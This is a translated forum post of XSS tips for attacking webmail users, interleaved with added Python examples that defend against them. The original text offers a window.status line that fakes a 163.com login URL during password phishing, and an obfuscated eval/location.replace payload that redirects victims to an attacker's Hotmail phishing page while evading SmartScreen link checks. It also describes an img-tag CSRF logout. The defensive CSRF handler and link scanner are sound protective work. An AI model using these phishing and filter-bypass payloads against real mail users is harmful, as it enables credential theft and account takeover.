XSS (first season) By: sH


Author: ShadowHider

Email: s@xeye.us

 

Over the past few days I've seen many posts in the forum discussing XSS. I played around with XSS for a while some time ago, so I'll venture to share a few things with you.

 

Below are a few small tips that barely count as tips. Anyone who has used XSS should have noticed them already, but I'd like to write them down again as a memo. :P

 

#1 Using the img tag for CSRF

 

Earlier, brother Sleep Dragon showed this in his post:

 


In fact you don't need to go to that much trouble; the following code achieves the same effect:

 

 

When an img tag has a src attribute, the browser sends a GET request for it. That request can be used to carry out a CSRF attack.

 

If the browser still holds the user's session, then simply visiting a page containing the above code logs the user out automatically, which is exactly what we wanted.
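The defence against this sits on the server: a state-changing action such as logout must never be reachable by a plain GET, the request must carry a token that only the application's own page knows, and the session cookie should be marked SameSite so that a cross-site img request does not carry it in the first place. The Python below is an added example, not code from the original post; the in-memory session store, the /logout handler, the origin https://mail.example.test and the token names are constructed assumptions.

```python
import hmac
import secrets
from http.cookies import SimpleCookie

# Constructed in-memory session store: session id -> session data.
# A real application would keep this server-side; the shape is an assumption.
SESSIONS = {"sess-alice": {"user": "alice", "csrf": "csrf-token-alice"}}

# Hypothetical origin of the mail application whose /logout we are protecting.
APP_ORIGIN = "https://mail.example.test"


def issue_session(user):
    """Create a session and return (session id, Set-Cookie header value).

    SameSite=Lax stops the browser attaching the cookie to cross-site
    sub-resource requests such as <img src=...>, so the GET triggered from
    another site arrives without a session and cannot log anyone out.
    """
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid, f"session={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"


def session_from_headers(headers):
    """Look up the session named by the Cookie header, if any."""
    cookie = SimpleCookie(headers.get("Cookie", ""))
    morsel = cookie.get("session")
    if morsel is None:
        return None, None
    return morsel.value, SESSIONS.get(morsel.value)


def handle_logout(method, headers, form):
    """Decide a /logout request. Returns (HTTP status, reason)."""
    sid, session = session_from_headers(headers)
    # 1. State changes never happen on GET: an <img src> can only send GET,
    #    so this alone already defeats the trick described above.
    if method != "POST":
        return 405, "logout requires POST"
    if session is None:
        return 401, "no session"
    # 2. Synchronizer token: the form must carry the token stored in the
    #    session. compare_digest avoids leaking it through timing differences.
    submitted = form.get("csrf", "")
    if not hmac.compare_digest(submitted, session["csrf"]):
        return 403, "bad csrf token"
    # 3. Origin check as defence in depth. Some privacy settings strip
    #    Referer, which is why the token above is the primary control.
    origin = headers.get("Origin") or headers.get("Referer", "")
    if not origin.startswith(APP_ORIGIN):
        return 403, "cross-site origin"
    del SESSIONS[sid]
    return 200, "logged out"


if __name__ == "__main__":
    # The GET an <img src="/logout"> would produce, with the cookie attached.
    print(handle_logout("GET", {"Cookie": "session=sess-alice"}, {}))
    # A genuine logout from the application's own form.
    print(handle_logout("POST", {"Cookie": "session=sess-alice", "Origin": APP_ORIGIN},
                        {"csrf": "csrf-token-alice"}))
```

The three checks are layered on purpose: the method check closes the img vector, the token closes forged POSTs from a page the attacker controls, and the cookie attribute keeps the session out of cross-site requests even on endpoints the other two checks might miss.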

 

#2 The browser status bar problem when phishing

 

Many people are keen to go after the target's email address during a penetration test. The various XSS mail attacks include cookie theft and password phishing.

 

Take password phishing as an example: did you notice that the browser's status bar looked a little awkward while the payload was executing?

 

Haha, add a line like this to your payload:

 

window.status = 'https://login.163.com/ppsecure/post.srf?wa=wsignin1.0...';

 

Code like this makes the whole phishing scene look more consistent (the link after the ... is the key part, lol). Note that current Firefox and Chrome ignore scripted assignments to window.status, so the trick only affects older browsers.

 


#3 Some details on exploiting a mail XSS

 

Since I've brought up mail XSS, let me say a bit more about it.

 

We should know that cookies stolen from a mailbox are useless, so the usual way to exploit a mailbox XSS is to redirect to your own password-phishing page (of course, some people use AJAX directly to read the mail instead). But if you write your phishing link directly into the payload and send it to the target's inbox, the payload will not execute when the mail is opened.

However, this is not the case if your own inbox has been added as a contact in the target mailbox. That is unrealistic, of course...

 

The reason is that SmartScreen checks the links contained in the mail. It appears to be a whitelist mechanism: any link that does not match is blocked.

 

For more information see http://www.microsoft.com/mscorp/safety/technologies/senderid/overview.mspx

 

It does seem a strange mechanism.

 

Of course, since JavaScript can be executed here, bypassing this detection is not hard; just obfuscate the link, as shown below:

 

eval(window.location.replace('hfuckttfuckp:fuck/1fuck11.111.fuck111.11/sn123w.snt1fuck23.mafuckil.fucklivefuck.cfuckom/hofucktmailfuck.htm'.replace(/fuck/g,'')))

 

After modifying the payload I tested again and found that it was no longer blocked by SmartScreen. Open the mail and it redirects straight away. Bingo!
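The bypass above works because the link scanner only sees the string literal as written and never sees the URL that the `.replace()` call reconstructs at run time. A scanner that statically applies that stripping idiom before extracting links, and then compares each link's host against the allowed list, catches the obfuscated form as well as the plain one. The Python below is an added example, not code from the original post and not SmartScreen's logic; the allowlist, the sample payloads (198.51.100.7 is a documentation address) and the idiom matcher are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist standing in for the mail provider's trusted link domains.
ALLOWED_HOSTS = {"mail.live.com", "login.live.com"}

# Matches the idiom  'literal'.replace(/token/flags, '')  used to hide a link.
STRIP_REPLACE = re.compile(
    r"""(['"])(?P<lit>[^'"]*)\1\s*\.\s*replace\s*\(\s*"""
    r"""/(?P<tok>[^/]+)/(?P<flags>[a-z]*)\s*,\s*(['"])\5\s*\)"""
)
# Plain URLs; '/+' also accepts the single-slash form browsers tolerate.
URL_RE = re.compile(r"\b(?:https?|ftp):/+[^\s'\"<>)]+", re.I)


def deobfuscate(js):
    """Statically apply each literal.replace(/tok/flags, '') found in js."""
    recovered = []
    for m in STRIP_REPLACE.finditer(js):
        flags = re.I if "i" in m.group("flags") else 0
        count = 0 if "g" in m.group("flags") else 1  # JS without /g replaces only the first match
        try:
            recovered.append(re.sub(m.group("tok"), "", m.group("lit"), count=count, flags=flags))
        except re.error:
            continue  # token is not valid as a Python regex; skip rather than crash
    return recovered


def extract_links(js):
    """URLs written plainly in the script plus those hidden behind the stripping idiom."""
    links = URL_RE.findall(js)
    for s in deobfuscate(js):
        links.extend(URL_RE.findall(s))
    return links


def host_of(url):
    """Hostname of url, normalising 'http:/host' to 'http://host' first."""
    fixed = re.sub(r"^(https?:)/+", r"\1//", url, flags=re.I)
    return (urlparse(fixed).hostname or "").lower()


def check_payload(js, allowed=ALLOWED_HOSTS):
    """Allowlist verdict over every link the script could navigate to."""
    links = extract_links(js)
    blocked = [u for u in links if host_of(u) not in allowed]
    return {"links": links, "blocked": blocked, "verdict": "block" if blocked else "allow"}


# Constructed samples: a plain redirect, the same target hidden with .replace(),
# and a legitimate link to an allowed host.
PLAIN = "window.location.replace('http://198.51.100.7/login.htm')"
OBFUSCATED = "eval(window.location.replace('hzzttzzp://1zz98.51.zz100.7/lozzgin.htm'.replace(/zz/g,'')))"
LEGIT = "window.location.replace('https://mail.live.com/inbox')"

if __name__ == "__main__":
    for sample in (PLAIN, OBFUSCATED, LEGIT):
        print(check_payload(sample))
```

This only covers the one idiom shown on the page; string concatenation, `String.fromCharCode` and similar tricks need their own handlers, which is why a scanner of this kind is a complement to, not a substitute for, refusing to execute script from mail content at all.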

 

That's all for now. I wrote this down wherever it came to mind, without much thought or structure. If there are omissions in this article, please bear with me; criticism and corrections are welcome. This is just for reference, and you are welcome to share your own ideas.
